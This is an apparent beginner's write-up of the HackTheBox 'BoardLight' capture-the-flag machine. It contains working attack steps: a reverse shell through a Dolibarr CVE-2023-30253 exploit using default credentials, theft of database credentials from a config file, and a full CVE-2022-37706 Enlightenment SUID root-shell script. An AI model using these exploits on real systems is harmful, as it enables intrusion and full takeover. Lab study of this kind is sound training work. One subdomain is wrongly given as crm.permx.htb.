HackTheBox BoardLight Writeup
Explore the fundamentals of cybersecurity in the BoardLight Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.
Add Hosts#
Edit the /etc/hosts file and add the following entries:
10.10.11.11 board.htb crm.board.htb
Script to add hosts automatically#
ip="10.10.11.11"
domain="board.htb crm.board.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV boardlight.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 18:16 CEST
Nmap scan report for board.htb (10.10.11.11)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration#
While exploring the application at http://board.htb/contact.php, the footer reveals info@board.htb
This suggests the existence of the board.htb domain.
To enumerate subdomains, use ffuf with the following command:
ffuf -u http://FUZZ.board.htb -c -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
- Discovered Subdomains:
- crm.permx.htb: [Status: 200, Size: 6360, Words: 397, Lines: 150]
Accessing the CRM subdomain at http://crm.board.htb, you find a Dolibarr 17.0.0 instance.
Testing default credentials admin:admin is found
Exploitation of Dolibarr (CVE-2023-30253)#
Using the CVE-2023-30253 exploit, which affects Dolibarr 17.0.0, you can gain access.
nc -lvnp 9001
git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
mv Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 CVE-2023-30253
cd CVE-2023-30253
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py http://crm.board.htb admin admin $vpnip 9001
rm -rf CVE-2023-30253
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Database Credentials#
Next, check for database credentials by inspecting the configuration file:
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php | grep 'db_'
SSH Access#
With the found database password, log in as the user larissa:
ssh larissa@board.htb
Privilege Escalation (CVE-2022-37706)#
During post-exploitation, LinPEAS identifies Enlightenment as a suid binary.
finding enlightenment suid exploit i found CVE-2022-37706
To exploit this, run the following script:
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take a few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]; then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
Root Access#
Once the privilege escalation exploit is successful, access the root flag:
cat /root/root.txt